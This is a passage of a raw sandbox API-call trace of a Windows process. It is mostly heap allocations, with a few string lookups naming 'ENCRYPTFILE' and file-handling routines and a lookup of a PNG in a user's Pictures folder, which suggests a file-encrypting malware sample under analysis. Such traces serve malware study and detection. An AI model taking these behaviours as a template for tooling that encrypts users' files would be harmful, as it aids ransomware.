hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0090.025] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0090.025] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0090.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0090.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0090.025] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0090.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0090.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0090.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0090.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0090.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0090.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0090.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0090.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b78 [0090.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0090.027] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0090.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0090.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0090.027] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0090.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0090.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0090.027] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Rk8a.png", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e0f0e0, ftCreationTime.dwHighDateTime=0x1d5e9a3, ftLastAccessTime.dwLowDateTime=0x913d65f0, ftLastAccessTime.dwHighDateTime=0x1d5e47e, ftLastWriteTime.dwLowDateTime=0x913d65f0, ftLastWriteTime.dwHighDateTime=0x1d5e47e, nFileSizeHigh=0x0, nFileSizeLow=0x1744a, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="Rk8a.png", cAlternateFileName="")) returned 0x41ac6c0 [0090.028] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0090.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0090.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0090.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0090.028] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0090.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0090.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0090.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0090.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0090.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0090.029] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0090.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0090.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0090.029] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0090.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0090.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0090.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0090.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2280 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0090.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0090.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0090.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0090.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0090.031] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0090.031] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0090.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0090.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0090.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0090.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.032] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0090.032] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0090.033] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0090.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0090.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0090.033] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0090.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0090.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0090.034] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0090.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0090.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0090.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0090.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0090.038] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: 